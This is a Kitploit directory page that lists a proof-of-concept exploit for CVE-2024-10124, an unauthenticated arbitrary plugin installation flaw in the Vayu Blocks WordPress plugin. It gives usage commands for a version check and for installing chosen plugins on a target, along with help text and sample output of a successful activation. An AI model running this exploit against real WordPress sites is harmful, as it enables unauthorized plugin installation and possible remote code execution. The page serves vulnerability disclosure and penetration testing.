Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-10124-Poc | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-10124-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubnxploited/cve-2024-10124-poc

CVE-2024-10124-Poc

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-10124-Poc

The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1.

Example Scenarios

Check Vulnerability

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

This will check the version of the vayu-blocks plugin to determine if the site is vulnerable.

Install a Plugin (Default)

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

This will install the default plugin hello-dolly

Install a Specific Plugin

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

This will install the plugin_name plugin on the target site.

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version

Output

root@kitploit:~
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

Note:

This script is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this script.

Download Tool
🔍CommandDescriptionExample
🌐-u or --urlSpecify the target URL for the WordPress site.-u http://192.168.100.74/wordpress
🔒--check-versionCheck if the site is vulnerable based on version.-u http://192.168.100.74/wordpress --check-version
⚙️-p or --pluginSpecify the plugin name (default is hello-dolly).-u http://192.168.100.74/wordpress -p plugin_name